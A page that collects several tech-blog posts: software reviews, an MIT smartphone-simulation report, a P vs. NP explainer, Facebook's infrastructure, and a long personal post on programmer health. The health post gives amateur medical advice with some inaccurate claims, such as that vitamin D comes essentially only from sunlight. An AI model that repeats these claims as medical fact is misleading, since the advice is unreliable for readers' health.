As you connect to a hot spot, simply run Hotspot Shield, and it will begin protecting you using the HTTP Secure (HTTPS) protocol. It launches a tab to show you that you’re connected; to disconnect, click the Disconnect button on the tab. To connect again, click the Connect button. You can also connect and disconnect by right-clicking the program’s icon in the System Tray.

You’ll need to take some care when you first install Hotspot Shield. If you don’t want its toolbar installed in your browser, uncheck the box next to “Include the Hotspot Shield Community Toolbar.” Also, make sure to uncheck the boxes for setting Hotspot Shield Private Search as your default search, setting your home page to the Hotspot Shield Private Search page, fixing “Page Not Found” errors, and enabling you to get instant alerts from the software — those options won’t do you much good and will likely annoy you.

A few caveats: When you run the software, it will open a browser tab to the product’s home page, which has ads on it. You can close that tab if you want; the program works fine without it open. Also, according to a page on the Hotspot Shield Web site, you might see targeted ads appear above Web pages you visit. That hasn’t happened to me, although I’ve seen complaints elsewhere around the Web about intrusive ads. Finally, some people who have downloaded the program have complained that it is unstable, or they were unable to uninstall it. In my tests I didn’t run across those problems, but be forewarned that others have reported them.

While AnchorFree offers Hotspot Shield for free, other companies sell similar VPN software products to protect you at public hot spots. ConnectInPrivate, for example, offers software and a service that costs $14.99 per month.

Price: Free

Compatible with: Windows 2000, XP, Vista and 7 (also Mac OS X 10.4, 10.5 and 10.6)

Download Hotspot Shield

Plug and Browse

If you use your laptop to connect to more than one wireless or wired network, you might be spending more time than you’d like switching network settings.

For example, if you’re a typical notebook user, at work you might have a static IP address, a default network printer, a set of scripts that need to be run, proxy servers for security and a set of mapped network drives. At home, you might have a DHCP-assigned network address on a wireless network as well as a home printer, and you might use Windows Firewall but no proxy servers. And then there’s that coffee shop hot spot that you visit regularly with its own set of requirements, such as a DHCP-assigned network address.

Each time you switch networks, chances are that you have to tweak settings such as your default printer, mapped network drives, proxy servers and so on.

Plug and Browse from Interactive Studios puts an end to all that manual configuration. It allows you to create profiles for all the networks you use, and then when you switch from one network to another, you simply choose the new network’s profile. All your settings will be intact.

A very nice touch is that you can tell Plug and Browse to automatically create a profile for you and it will grab all of your current settings for the network to which you’re connected. You can still edit the settings after that if you need to.

Price: $39.99 (with 30-day free trial)

Compatible with: Windows XP, Vista and 7

Download Plug & Browse

Link

Supercomputing: There’s an App for That

What if you could perform supercomputing calculations in real-time, on your smartphone, in any location?

Researchers at the Massachusetts Institute of Technology (MIT), collaborating with staff at the Texas Advanced Computing Center (TACC), have created an application that does just that.

The team performed a series of expensive high-fidelity simulations on the Ranger supercomputer to generate a small “reduced model” which was transferred to a Google Android smart phone. They were then able to solve problems on the phone and visualize the results on the fly.

The project proved the potential for reduced order methods to perform real-time and reliable simulations for complicated problems on handheld devices.

“You don’t need to have a high-powered computer on hand,” said David Knezevic, a post-doctoral associate in mechanical engineering at MIT working in the lab of Prof. Anthony Patera. “Once you’ve created the reduced model, you can do all the computations on a phone.”

A screenshot of an engineering application developed by the researchers for the Andriod smart phone.

This is not the first time that model reduction algorithms have been used to ameliorate the complexities of large-scale physical simulations.  The advantage of the system designed by Knezevic and his colleagues is its rigorous error bounds, which tell a user the range of possible solutions, and provide a metric of whether an answer is accurate or not. The error bounds are based on mathematical theory developed in Prof. Patera’s research group at MIT over a number of years.

“We have a bound on how much accuracy we’re losing with our reduced model, so we can say with rigor that we’re doing supercomputing on a phone,” Knezevic said.

The reduced model is constructed by focusing the supercomputer simulations on a range of parameters that are of interest to the user.  Once the construction is finished, the model can be used to perform simulations for new parameters, nearly instantaneously, for use in real-world applications.

“We’re interested in accurate, real-time computing, and the calculations on the phone take less than two seconds,” Knezevic said.

So far the team has developed a number of demonstration problems that run on the system, mainly fluid dynamics, acoustics and heat flow simulations. However, many different problems can be handled with this method.

In its smartphone form, the researchers imagine their method could be applied to “in the field” inverse problems like landmine detection, as well as to design problems like determining the optimal shape for structures.

David Knezevic (above) is a post-doctoral associate in mechanical engineering at MIT. John Peterson (below) serves as a research associate in the high performance computing group at TACC.

TACC provided access to Ranger to compute the problems and TACC staff collaborated with Knezevic to debug and parallelize the code so it could scale efficiently to thousands of processors on the system.

“The payoff for model reduction is larger when you can go from an expensive supercomputer solution to a calculation that takes a couple of seconds on a smart phone,” Knezevic explained. “That’s a speed up of orders of magnitude.”

The improvements allowed the team to compute three-dimensional solutions, and to work with the complicated class of non-linear equations in which the researchers were interested.

“After collaborating on the code for several months, it was much more powerful, flexible and efficient,” said John Peterson, a research associate in the high performance computing group at TACC and a collaborator on the project.

Using the smart phone application, researchers can change values, improve the error bounds by increasing the complexity of the local calculation, and even visualize the solution interactively in three dimensions.

“It’s demonstrating that with a small processor, you can still get a meaningful answer to a big problem,“ Peterson said.

The real impact of the system may come in the application of these methods to aircraft or automobiles, which use control systems to react to inputs from the environment in order to achieve optimal safety and performance. Examples include traction control in cars and stabilization systems in jet fighters.

“If you have sensors feeding in data to the reduced order model system, then it could solve the equation corresponding to the input data, and indicate the appropriate response in real-time based on the calculations you performed on a supercomputer,” Knezevic said.

“The control system needs a simplified model of the aircraft so that it can make split-second updates to the ailerons and flaps,” Peterson added. “That simplified model is the reduced basis model.”

Creating a lightweight instantiation of this technology in the form of a smart phone application signals many new possibilities for reduced order modeling in applied science and engineering.

Concluded Knezevic: “When you tell people you can solve a problem that would normally take two hours on Ranger in one second, with guaranteed error bounds, people instantly understand what model reduction is all about.”

Link

P vs. NP for Dummies

A reader named Darren commented on my last post:

I have this feeling that this whole P and NP thing is not only a profound problem that needs solving, but something that can be infinitely curious to try and wrap your mind around…

Thing is- there’s a whole world of great minded, genius hackers out here that can’t understand one iota of what anyone is talking about. We’re not your traditional code-savvy hackers; we’re your inventors, life hackers, researchers, scientists… and I think I can speak for most of us when I say: We would love to take the time to really dive into this thread, but we ask that someone (you) write a blog that breaks this whole thing down into a rest-of-the-world-friendly P/NP for dummies… or at least explain it to us like we’re stupid as hell… at this point I’m really okay with even that.

I’m of course the stupid one here, for forgetting the folks like Darren who were enticed by L’Affaire Deolalikar into entering our little P/NP tent, and who now want to know what it is we’re hawking.

The short answer is: the biggest unsolved problem of theoretical computer science, and one of the deepest questions ever asked by human beings!  Here are four informal interpretations of the P vs. NP problem that people give, and which I can endorse as capturing the spirit of what’s being asked:

  • Are there situations where brute-force search—that is, trying an exponential number of possibilities one-by-one, until we find a solution that satisfies all the stated constraints—is essentially the best algorithm possible?
  • Is there a fast algorithm to solve the NP-complete problems—a huge class of combinatorial problems that includes scheduling airline flights, laying out microchips, optimally folding proteins, coloring maps, packing boxes as densely as possible, finding short proofs of theorems, and thousands of other things that people in fields ranging from AI to chemistry to economics to manufacturing would like to solve?  (While it’s not obvious a priori, it’s known that these problems are all “re-encodings” of each other.  So in particular, a fast algorithm for any one of the problems would imply fast algorithms for the rest; conversely, if any one of them is hard then then they all are.)
  • Is it harder to solve a math problem yourself than to check a solution by someone else? [[This is where you insert a comment about the delicious irony, that P vs. NP itself is a perfect example of a monstrously-hard problem for which we could nevertheless recognize a solution if we saw one—and hence, part of the explanation for why it’s so hard to prove P≠NP is that P≠NP…]]
  • In the 1930s, Gödel and Turing taught us that not only are certain mathematical statements undecidable (within the standard axiom systems for set theory and even arithmetic), but there’s not even an algorithm to tell which statements have a proof or disproof and which don’t.  Sure, you can try checking every possible proof, one by one—but if you haven’t yet found a proof, then there’s no general way to tell whether that’s because there is no proof, or whether you simply haven’t searched far enough.  On the other hand, if you restrict your attention to, say, proofs consisting of 1,000,000 symbols or less, then enumerating every proof does become possible.  However, it only becomes “possible” in an extremely Platonic sense: if there are 21,000,000 proofs to check, then the sun will have gone cold and the universe degenerated into black holes and radiation long before your computer’s made a dent.  So, the question arises of whether Gödel and Turing’s discoveries have a “finitary” analogue: are there classes of mathematical statements that have short proofs, but for which the proofs can’t be found in any reasonable amount of time?

Basically, P vs. NP is the mathematical problem that you’re inevitably led to if you try to formalize any of the four questions above.

Admittedly, in order to state the problem formally, we need to make a choice: we interpret the phrase “fast algorithm” to mean “deterministic Turing machine that uses a number of steps bounded by a polynomial in the size of the input, and which always outputs the correct answer (yes, there is a solution satisfying the stated constraints, or no, there isn’t one).”  There are other natural ways to interpret “fast algorithm” (probabilistic algorithms? quantum algorithms? linear time? linear time with a small constant? subexponential time? algorithms that only work on most inputs?), and many are better depending on the application.  A key point, however, is that whichever choices we made, we’d get a problem that’s staggeringly hard, and for essentially the same reasons as P vs. NP is hard!  And therefore, out of a combination of mathematical convenience and tradition, computer scientists like to take P vs. NP as our “flagship example” of a huge class of questions about what is and isn’t feasible for computers, none of which we know how to answer.

So, those of you who just wandered into the tent: care to know more?  The good news is that lots of excellent resources already exist.   I suggest starting with the Wikipedia article on P vs. NP, which is quite good.  From there, you can move on to Avi Wigderson’s 2006 survey P, NP and mathematics – a computational complexity perspective, or Mike Sipser’s The History and Status of the P vs. NP Question (1992) for a more historical perspective (and a translation of a now-famous 1956 letter from Gödel to von Neumann, which first asked what we’d recognize today as the P vs. NP question).

After you’ve finished the above … well, the number of P vs. NP resources available to you increases exponentially with the length of the URL.  For example, without even leaving the scottaaronson.com domain, you can find the following:

Feel free to use the comments section to suggest other resources, or to ask and answer basic questions about the P vs. NP problem, why it’s hard, why it’s important, how it relates to other problems, why Deolalikar’s attempt apparently failed, etc.  Me, I think I’ll be taking a break from this stuff.

Link

Inside Facebook’s Open Source Infrastructure

Facebook connects its 500 million users using an array of open source software to enable social networking as well as data intelligence. Facebook’s open source Web serving infrastructure has a lot more than just the traditional LAMP (Linux/Apache/MySQL/PHP) stack behind it.

During a keynote session at the OSCON open source conference, David Recordon, the senior open programs manager at Facebook, detailed the infrastructure in use today at Facebook.

At the language level of the stack, Recordan noted that Facebook is using PHP by way of its own HipHop PHP runtime project. Facebook officially announced HipHop earlier this year as a way to speed up PHP operations, improve efficiency and decrease CPU utilization.

At the database tier, Recordan said Facebook primarily stores user data in the MySQL database. He said that Facebook runs thousands of MySQL nodes, though he added that Facebook doesn’t care that MySQL is a relational database.

“We generally don’t use it (MySQL) for Joins and we aren’t running complex queries that are pulling multiple tables together inside of a database,” Recordan said.

Recordan said that Facebook has three different layers for data. At the first layer is the database tier, which is the primary data store and where MySQL sits. On top of that, Facebook uses Memcached caching technology, then a Web server on top of that to serve the data.

“We’re actually using our Web server to combine the data to do joins and that’s where HipHop is so important,” Recordan said. “Our Web server code is fairly CPU-intensive because we’re doing all these different sorts of things with data.”

In addition to MySQL, Facebook leverages a pair of NoSQL-type databases as well including Cassandra and HBase, which is part of the Apache Hadoop project.

“While we store the majority of our user data inside of MySQL, we have about 150 terabytes of data inside of Cassandra, which we use for inbox search on the site and over 36 petabytes of uncompressed data in Hadoop overall.”

Recordan said that Facebook’s Hadoop cluster has a little over 2,200 servers in it, running a total of 23,000 CPU cores inside of them. He added that by the end of the year, Facebook expects to be storing over 50 petabytes worth of information.

The Hadoop components help to enable Facebook to use the data it has to understand how people are using the site. Recordan said that Facebook uses data analysis for all sorts of product decisions including how Facebook sends e-mails and how it ranks news feeds.

In order to help enable the data analysis, Facebook uses an open source technology called Scribe.

“Scribe takes the data from our Web servers and funnels it into HDFS (Hadoop Distributed File System) and into our Hadoop warehouses,” Recordan said. The problem that we originally ran into was too many Web servers trying to send data to one place, so Scribe breaks it up into a series of funnels for collecting data over time.”

Recordan said that Facebook’s Hadoop cluster is vital to the business and the system is highly monitored and maintained. Facebook has what it calls a Platinum Hadoop cluster, plus a second cluster called the Silver Hadoop cluster where data from the Platinum cluster is replicated.

Additionally Facebook uses the Apache Hive technology, which provides a SQL interface on top of Hadoop to do data analysis.

“A large part of our infrastructure is open source and we really think that it’s important in terms of being able to allow developers that are building with the Facebook platform to scale using the same pieces of infrastructure that we use,” Recordan said. “Fundamentally we’re all running into the same sets of challenges.”

Link

Common Programmer Health Problems

I’m currently working on the last few lessons in Learn Python The Hard Way and I want to include a lesson on general health problems programmers run into during their careers. I find many programmers seem to ignore their body’s physical state when they’re coding, most likely due to the intense concentration required. I’m hoping other people could benefit by simply understanding a few health related problems programming has almost caused me or caused many other people I know, and how I avoided them.

I probably won’t put this whole blog post into LPTHW since it’s a bit much, but I will make a shorter version of it. Please feel free to let me know if you hate it or like it or if you have some additional resources I could reference.

My Background And Qualifications

In the past I was a top qualified soldier in the US Army, and I have studied many martial arts. These days I’m not as into working out and studying martial arts as I used to be, instead focusing on yoga, meditation, and simpler activities. When I was younger I was incredibly fit, and still am because of habits and practices I ingrained in myself from an early age.

First a quick list of martial arts I’ve studied for various periods of time: Ninjitsu, Aikido, Judo, Muay Thai, Wing Tsung, Capoeira, and Arnis in no particular order. I would say only Muay Thai is the one I studied most consistently, for probably about 6 years. The others I studied for about 1 or 2 years if I could. I moved around a lot so the only way to study was whatever was in the area.

Also, in the US Army I was at the top of my physical fitness exam, going from barely passing to maximum scores consistently in about 2 years. This involved about 2-4 hours of working out nearly every day if I remember it correctly, which in the Army isn’t that difficult. There’s really nothing else to do.

Finally, I’ve been the exact same weight, flexibility, and nearly the same strength my whole life, whether I worked out or not, which means that I probably can’t tell you about how to lose weight. I’m most likely genetically predisposed to be this way. That means you should adapt my advice to fit your life and what you’ve found healthy.

With all that being said, as I’ve gotten older I much more enjoy the less violent and more “supple” forms of exercise. I feel Yoga is excellent exercise because it’s deceptively difficult. I’d also vote for Pilates, swimming, dance, and anything that doesn’t cause direct impact on my body. I especially have to watch out for my hands for reasons I’ll explain in a bit.

Alright, that should give you an idea that I know something, but more importantly, while doing all of these things, I also wrote software professionally. After getting out of the Army I averaged about 8-16 hours of coding and study a day. I also touch type and I play guitar, yet I’ve mostly avoided carpel tunnel and other RSI problems.

Hopefully, my experience maintaining my physical health will help you gain some or keep yours.

Common Problems Programmers Face

Programming is a deceptively damaging field to be in, partly because it doesn’t seem like you’re doing much, and also because of the attitude many programmers have toward their body. You should care about keeping yourself healthy because, when your body is in good shape, that removes “friction” from your mental capacity so that it can focus on important things rather than annoying little problems with your physical wellness.

Obviously the advice on eating right, going outside, getting exercise has been said by everyone. I’m not really going to tell you how to eat, or work out, or how to do a martial art or something else to stay healthy. If you are interested in those things, then please find a professional who can train you and help you.

What I do want to cover are a set of particular problems programmers have from their daily profession. These are just simple really obvious things that for some reason programmers don’t realize aren’t supposed to be happening:

  • Pain in your wrists from Repetitive Strain Injury (RSI).
  • Problems with your eyes from staring at moving print for extended periods.
  • Back problems from poor posture, especially in the lower back and upper shoulders.
  • Bowel and urinary issues from not crapping and pissing when you should.
  • Dehydration from drinking too much caffeine and not enough water.
  • Problems with hemorrhoids and the prostate for guys from sitting too much. Yep, I’m gonna go there.
  • Vitamin D deficiency from lack of sunshine.
  • Sleeping disorders from staying up late and drinking too much coffee.
  • General stiffness and soreness from a lack of stretching in general.

I’ve had to struggle with all of these problems at one point in my life because of programming, guitar, or actually from lifting weights wrong. In each case I was able to get healthy and then avoid it the rest of my life, and really only deal with a few problems periodically. You may think some of these are stupid, but believe me, many programmers have these problems for various reasons even if you might not.

The General Cause

Overall the general cause of all of these problems can be summarized as treating programming as an obsession. You may want to be very good at it, like I did, so you exclude everything else in your life in order to master it. You don’t go to the bathroom, you have macho 10 hour coding sessions, you don’t eat right, and all manner of mythological beliefs about “real programmers”.

Truth is real programmers are kind of idiots. They don’t eat right. They don’t have sex on a regular basis. They can’t run without gasping for breath. They have huge problems with their internal organs not caused by disease. Really, it’s just not worth it if you have to kill yourself to be good at something.

So, as you read through each of these problems and how I’ve cured them, remember that it’s all about just having a balanced life and not being obsessed with coding or your business. Trust me when I say you will actually become better if you take it easy on yourself and stay healthy.

Wrist Pain

This is probably the one I struggle with the most, because I code and play guitar quite frequently and for long periods of time. I’ve had pain in my wrists periodically since I started coding professionally at 22, but I always had a set of Aikido exercises I did to get my wrists straight.

You see, Aikido has these fantastic wrist exercises that make your wrists strong and supple at the same time. They developed the exercises to avoid injuries during practice since many of the Aikido techniques involve wrenching, ripping, and breaking the joints in the arms, wrists, and shoulders.

For me these exercises have always fixed any misalignment and pain, and they’ve allowed me to code for long periods of time without much trouble. Typically the only time I’ll have problems is if I’ve switched keyboards and have a new odd keyboard layout, but if I do I simply do the exercises for about a week every time I go to code and they get strong again.

Now, if you have serious carpel tunnel or another kind of RSI then consult your physician before trying these. If you do them, then start very slowly, and do not try to make them hurt. Stretching should not hurt, it should just be “mildly uncomfortable”. If it hurts, then you are straining to do the stretch.

What you actually want to do is relax into every stretch you do. It’s hard to explain, but instead of forcing your joint to a certain position, bring it to that position and then think about relaxing it or “letting” it move a bit further.

Keep this in mind, and then here’s a set of videos that show you how to do each exercise:

Here’s how you use these exercises before you sit down to type (every time!):

  1. First, you need to warm up, so put your hands out in front of you and grab at the air as fast as you can 20 times. Then shake your hands, then rotate your wrists 10 times one direction and 10 times another.
  2. Start with the first exercise you’re best at, and do 5-10 of them at a medium speed.
  3. Continue through each one, but after each one shake your hands and arms and rotate your wrists to realign them. These exercises do some moving of the bones in your wrist, so shaking them sort of makes them settle back in.
  4. NEVER do too much strain on your wrists. Do just enough to get them going and feeling supple and relaxed, but the motto “no pain no gain” will only damage you.

Do these each time you go to type, every day, and any time you stop. It doesn’t take long to do them, and after a bit of discomfort as your wrists start to adapt and get realigned, you’ll start to feel better.

One more time though: DO NOT DO THIS WITHOUT CONSULTING A DOCTOR FIRST You do these at your own risk, so don’t sue me if you fuck up your wrists because you didn’t pay attention. These exercises have been done for maybe thousands of years in various martial arts, so I know they aren’t dangerous but everyone is different. You could screw yourself up bad if you do them wrong, so if it hurts stop doing them and talk to a doctor!

Guitarists Are Worse

Programmers will get RSI but it’s nothing compared to what guitarists and bassists get. For various stupid reasons there’s myths around many of the big name musicians and their claims of studying “8 hours a day” or “16 hours a day!”. Because of this guitarists will kill themselves and damage their hands making it impossible to play.

Guitar is a hard instrument on your hands, so even a little pain can put you out of commission. I learned this the hard way in school because, like an idiot, I believe my instructors when they said I had to study 8 hours a day. I literally thought they meant 8 hours straight, so I did that for about a month and then BAM!

Fucked up my thumb and gave it a bone spur and all my fingers hurt like crazy. My wrists were solid, but my fingers just couldn’t take it. Like an idiot I didn’t listen to what I already knew which is any new activity has to be gradually increased like any other work out.

The only way I could fix this, and it took nearly 1.5 years, was to do the following:

  1. Find guitars that didn’t hurt my hands. The idea that you can “play any guitar” is crap. Get the best guitar you can that doesn’t hurt you.
  2. Do the above exercises, and then some more for my fingers.
  3. Start slowly rebuilding my fingers and thumb by doing a set of exercises to improve their strength and relaxation.
  4. Constantly focus on relaxing while playing so that I could use a lighter touch.
  5. Avoid bends as they hurt my hands and caused me injuries.
  6. Changed my position and playing style so that I’m able to move around quickly without having to grip the guitar, instead my thumb is on the back of the guitar where it’s comfortable.
  7. Adjusted the height of my guitar so that it was comfortable on my shoulder and hands to play.
  8. Always play standing up now, rarely sitting down for long periods of time because the position is awkward, and if I do I keep the same position.

After doing that for the last year my hands are finally feeling good and have healed up, and I’ve not got good habits that prevent me from injuring myself. I’m an old guy so these things are important, but that also means I can’t do anything that might hurt my hands.

My hands are my life right now, so that means no boxing, capoeira, or anything else I really want to study. I have to much riding on my hands to waste it on a punching bag.

Eye Strain

I think this isn’t as much of a problem as it was for me, but you have to watch out for your eyes. I had perfect better than 20/20 vision when I was younger, but from decades of computer use my eyes are “slightly off”. I have a minor correction in glasses and these days I just wear them all the time even if I only need them a little bit. The world is just annoyingly fuzzy without them.

Back in the bad old days we stared at CRT screens all day, which had horrible annoying flicker and screwed up quite a few eyes. These days it’s not the flicker so much as the poor font rendering on most LCD screens. Thanks to patents owned by Apple (I think) many computers can’t render fonts well on an LCD screen. Some folks though think Apple’s font rendering looks “fuzzy” so your mileage may vary considerably.

In my case I try to get out for about 2 hours a day and not look at a computer. Either I do something that doesn’t involve reading like play guitar, or I go for a walk or to the park. I may not do this for a full 2 hours but I try to not start at a computer screen for at least 2 hours a whole day.

This will also help with headaches you might have. Frequently programmers will think that the lighting in a room is what gives them headaches from using a computer, but really it’s bad posture, shitty fonts, not drinking enough water, and just using the computer for too long at a stretch.

Instead of doing some extreme thing like turning out all the lights in your office, just have good lighting and use a color scheme that fits the type of LCD you have and the room’s lighting. It’s the combination of room/area lighting, LCD brightness, LCD quality, fonts, and your color scheme that will make you feel better.

But most importantly, just take a break.

Back Problems

I’ve been extremely luck to have a good solid back most of my life. Even though I’ve been sitting in a chair for a good portion of that life, I still have a good flexible and strong back.

For me, the problem is in my upper back, neck, and shoulders. I tend to hunch over the keyboard and have to force myself to sit up straight. In fact right when I started typing this section I noticed I wasn’t sitting up straight and had to correct it.

Now, the choice of chair matters, and I tend to like either Aeron chairs of some kind of solid small stool or bench. I’m currently very much liking my little $40 piano bench I used to sit on to practice piano. It doesn’t have a back so it forces me to sit up straight more often and engage my core muscles (stomach and back muscles).

For my shoulders though it’s entirely stress. I tend to “scrunch up” my shoulders when I’m focused intensely and that causes my whole upper back to hurt, sending pain all the way up my neck and head. It gets really bad if I practice guitar for long periods at a time.

What I’ve found helps the most is stretching your upper arms and doing push-ups. Stretching your upper arms is as simple as grabbing a door jam, grabbing it, and pulling each arm or both arms in a different direction. Try these if you’re feeling stiff:

  1. Grab a door jam with one arm so your palm faces the front of your body, then pull your shoulder out so you stretch your chest and the front of your shoulder.
  2. Grab the door jam with one arm so that your arm crosses your body, and again with your palm facing the front (kind of backwards), then pull so your shoulder at the back is stretched.
  3. Put both arms on the door jam in front of you, right above your head, and stand away from it a bit so that you lean down and pull your arms above you and back.

If you do that, and also rotate your shoulders and shake your body out you’ll start to feel much better. Maybe combine this with your wrist stretches before you work each day.

Another big help is doing some push-ups. I wouldn’t do these at work or before you work because it will make you tired and make it hard to work. I’d instead just do 10 a night before you go to sleep. Just 10 will do a lot for your chest, back, wrists, and neck. Don’t do them very fast, but do them slowly and focus on balancing your body when you do them.

Dehydration

This one is simple, and I’m guilty of it quite frequently. I find I drink a ton of coffee, and because of that I have to make sure I drink some water too. If I don’t I get headaches and really don’t feel right. The problem with dehydration is it’s hard for you to tell you’re suffering from it until it’s too late.

What I suggest, and what I’ve started doing more, is that you drink a bottle or cup of water with every non-water beverage you drink. I also recommend you ditch the sodas. They’re just full of nasty fake sugar that make you fat and cause diabetes, and they’re not rehydrating you. If you gotta drink something then plain black coffee is pretty damn good, but again drink some water with it.

Bowel And Urinary Problems

Alright the next two are kinda gross so I won’t go into what happened to me, but I’ll say this:

Go to the fucking bathroom right when you have to go. Don’t wait.

You wouldn’t believe how useful this advice is and I really wish I’d been told it when I was younger. Because I would code non-stop like a “real programmer” I would skip bathroom breaks and hold it in for far too long. The problem is with bowel movements your body just stops telling you to crap, and then it builds up.

This eventually leads to constipation and it’s a motherfucker on your health. For your urinary tract it causes problems that are less important, but you can get infections and other nice little surprises.

If you’ve already screwed up, the best thing to do is go get some fiber tablets and take them then stay home ’cause it’s gonna get ugly.

Then, when you feel you need to go, just get up and go for the love of god. I’m telling you, your brilliant idea will come more naturally after you poop.

Hemorrhoids and Prostate Health

The other problem you have from not using the restroom when you should is that you get hemorrhoids. Yeah yeah, I know, really gross and I promise this is the only time I’m gonna mention them ever. But, many programmers have them and are ashamed to talk about them or even know what causes them so I’m going to lay it out for you. I’ve actually done all of these but only had them once or twice:

  1. Sitting for a long period of time.
  2. Lifting heavy weights without proper equipment.
  3. Not taking a dump when you actually need to.
  4. Forcing a dump when you don’t need to.
  5. The worst one though: Sitting on the toilet reading.

This last one is the killer let me tell you. If you don’t have to go, then do not sit on the can hanging out. What this does is put all the weight of your body and bowels on your already probably screwed up rectum and then pushes it out. Nasty. That also then causes hemorrhoids because the pressure increases in your blood vessels unnaturally.

These are just freaking gross, but they’re also potentially harmful. Yes, you can get some that are so bad you bleed all over the place. If you have some, please go see your doctor and deal with it. You may need surgery, so just do it. I didn’t but man it was close. One year I was lifting weights, working in a warehouse, coding non-stop, and not using the bathroom.

Yep, I was idiot, so don’t make the same mistake. Make sure you do these three things to keep your ass healthy:

  1. Eat some veggies regularly, or eat some fiber tablets at least.
  2. Go to the bathroom right when you have to go.
  3. Don’t force pressure down there in any way.

This can also damage your prostate if you aren’t careful, but usually that’s from sitting on your ass all day. Just get up and walk around or take breaks and you’ll fix that problem. If you find blood in your urine or you have problems peeing, go see a doctor because it might be more serious. If you pee a lot it can also be bad, so again see a doctor.

Vitamin D Deficiency

Vitamin D is weird. You really only get it from the Sun but you don’t need much direct sunlight to get it. Maybe like 5-30 minutes depending on how strong it is. It’s also tied to your calcium levels, and a lack of phosphate, but if you eat regularly and something other than potato chips that shouldn’t be a big problem.

Some of the things you can get are depression, screwed up teeth, pain in weird places like in the bones in your arms, cramping muscles, and just generally feeling like crap. If you’re really bad you might need to get a prescription from a doctor, but usually you can just make a plan to go outside for 30 minutes when the Sun is high in the sky.

In fact, I think this is one of the problems with catered food at many startups here in the Valley. Since you are inclined to stay in the office and eat food and constant leftovers, and because many offices have poor lighting, you tend to not go outside when the Sun is out. Combine that with poor sleeping habits and you can really be screwing up your vitamin D levels without knowing it.

Just something as simple as not eating the catered lunches and walking outside at noon to get your food could help more than you know. Anyway the food is better.

I got minor vitamin D deficiency when I lived in Vancouver and Seattle. Up there you just don’t have sunshine for months on end, and for me that was a killer. Some people can handle it, but for people like me who lived on a tropical islands in his teens, this was just murder.

So, if you have sunshine, get out and grab some when you can.

Sleeping Disorders

I’ve always had a flexible sleep schedule, usually depending on the season and the region. In some areas I trend toward a night owl persona and stay up really late doing things then sleeping in. Lately since moving to SF I’ve been getting up earlier and not staying up as late, and I’ve actually been feeling really good lately.

Sometimes though, and I’m not sure why, I feel way more productive in both music and coding late at night, or very early in the morning. I think it’s because I’m still in a tired state and so my brain is relaxed. I also think it’s because it’s very quiet and I can just hang out and think with no distractions.

Either way, this need to either get up very early or stay up very late sort of screws with my sleep schedule. I find that I much prefer getting up early as I get older. I feel more awake and rested during the day. If I stay up late and sleep in I feel like I have a hangover and I can get headaches.

If you have problems sleeping though, I have a very simple kind of meditation that I’ve been using for years to help you crash. It takes a bit of practice, but it totally works and works quickly.

First up, if you can, get the best damn bed you can afford. 2000+ dollars is nothing for a great bed. I spent at least 2200 on a sweet Tempur-Pedic. It’s totally worth it.

Now with your awesome bed here’s how you start practicing getting to sleep easily. It’s kind of a self-hypnosis trick:

  1. Make sure that you’ve killed all sounds and lights that might be in your room.
  2. Lay on your back and put your hands on your body somewhere comfortable, or at your sides.
  3. Start breathing in deeply and slowly and breathing out, as you do this imagine you can see the air flow in and out of your body.
  4. Once you start to see your breath, imagine that you’re looking through a window and outside the window is a large huge open space with stars in it.
  5. As you breath feel yourself float through the window and slowly out into the massive expanse of stars, all floating softly around you.
  6. Keep this going and then just let this floating spread into your bed and out around you until there is nothing.

You probably will crash out at around 4 or 5, but if not just hang out and keep letting yourself float and melt until you do.

If you have severe insomnia then definitely talk to a doctor about it, but try this out, as well as exercising like crazy for about an hour or two a day. Exercise will definitely make you sleep.

Stiffness And Flexibility

If you constantly feel “stiff” or unable to move well, then you probably need to stretch regularly. Really the best thing you can do is go to yoga about once a week, and then try to do the exercises on your own. If you can’t do that, then go get any number of books on basic stretching from the library or from a book store. You really just need a simple book on the subject, and you don’t need to do too many.

I think if you did about 5-6 big stretching exercises a night before sleeping you’d feel very relaxed and see a major improvement in your general health and feeling.

Relaxing your body through stretching relaxes your mind as well, so a great way to improve your creativity and boost your ideas is to do yoga or stretching for about 30 minutes, then take your morning shower. Combine this with some meditation and you’ll start to see a major improvement in your general ability to mentally adapt and start to see yourself make odd connections you wouldn’t have before.

I’m not sure why this is, but a relaxed mind is crucial to spontaneous creativity and idea generation.

A Simple First Step

This is probably a lot of information for one person, and I seriously hope that you don’t have all of these problems. What I recommend though if you don’t have these issues is that you try to avoid them. If you’re just starting out then you need to maybe adopt a simple “coding warm-up” routine you can go through before you code.

Here’s what I do before I sit down to code, or before I play guitar, and whenever I get stiff and need a break:

  1. Rotate all the joints in your body by just moving your wrists, arms, neck, back, and hips in a few little circles. Say 5 one direction, then 5 in another direction.
  2. Do a small number of the wrist exercises and shake your wrists between each set.
  3. Stretch your arms above your head as high as you can, and then stretch them back as far as you can, and then pull them across the front of your body.
  4. Finally, carefully use your hand to pull your head to the right, left, forward, and back a bit.

If you just did this you would avoid quite a few programming injuries. Since programming isn’t really that physically taxing it’s fairly easy to avoid hurting yourself, so this is really all you need.

However, if you have a specific problem, then again consult a physician and try some of my advice if they say it’s alright. Nothing I’m proposing here is radical or weird, just basic exercises and common sense, so it should be alright with any doctor. I just don’t want to get sued so remember I told you to ask one first.

Hopefully that helps you out, and if not just remember the advice in case you run into these. If you’re lucky they won’t be a problem but I think every programmer I know has had something like this at least once.

If you have other problems along these lines, then feel free to email me and I’ll reply with some advice.

Take care.

Link